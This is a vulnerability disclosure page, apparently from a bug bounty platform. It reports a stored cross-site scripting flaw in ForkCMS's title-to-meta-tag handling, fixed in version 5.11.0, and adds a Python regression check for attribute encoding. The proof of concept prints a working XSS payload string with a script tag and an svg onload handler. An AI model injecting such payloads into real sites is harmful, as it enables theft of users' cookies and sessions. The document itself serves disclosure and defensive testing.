Cross-site Scripting (XSS) - Stored in forkcms/forkcms


Reported on

Oct 19th 2021


Hello. ForkCMS does not properly sanitize the website's TITLE when it is imported into the meta tags.

Proof of Concept

If we set the page title to something like this: <title>Home - Hi'&gt;"&lt;script src=//xss&gt;&lt;/script&gt;&lt;x="{9*9}\r\n%0A%09%0D&lt;svg\onload=confirm(1)&gt;</title>

It gets reflected back here: <meta name="application-name" content="Hi'>&quot;<script src=//xss></script><x=&quot;{9*9}\r\n%0A%09%0D<svg\onload=confirm(1)>">


This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the user’s browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website.
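An added regression check, not part of the original report or of ForkCMS's own code: it renders the application-name meta tag with and without attribute encoding, then parses the result to confirm the title stays inside the content attribute. The render functions, the check name and the shortened sample title are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the start of the title value from the report, entity-decoded.
SAMPLE_TITLE = "Hi'>\"<script src=//xss></script>"


def render_raw(title):
    """Hypothetical template that interpolates the title with no encoding."""
    return f'<meta name="application-name" content="{title}">'


def render_escaped(title):
    """Same tag with the value encoded for a quoted HTML attribute."""
    return f'<meta name="application-name" content="{html.escape(title, quote=True)}">'


class MetaAudit(HTMLParser):
    """Records every start/end tag and the application-name meta attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.events = []        # tag events in document order
        self.attr_names = []    # attribute names seen on the meta tag
        self.content = None     # decoded value of its content attribute

    def handle_starttag(self, tag, attrs):
        self.events.append(tag)
        attr_map = dict(attrs)
        if tag == "meta" and attr_map.get("name") == "application-name":
            self.attr_names = [name for name, _ in attrs]
            self.content = attr_map.get("content")

    def handle_endtag(self, tag):
        self.events.append("/" + tag)


def title_stays_in_attribute(markup, title):
    """True only if the markup parses to a single <meta> carrying exactly the
    name and content attributes, with the decoded content equal to the title."""
    audit = MetaAudit()
    audit.feed(markup)
    audit.close()
    return (audit.events == ["meta"]
            and audit.attr_names == ["name", "content"]
            and audit.content == title)
```

Run against rendered pages in a test suite, the check fails as soon as a title can end the content attribute early or add attributes or elements of its own.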

We have contacted a member of the forkcms team and are waiting to hear back a year ago
Jelmer Prins validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins marked this as fixed in 5.11.0 with commit c21306 a year ago
Jelmer Prins has been awarded the fix bounty
This vulnerability will not receive a CVE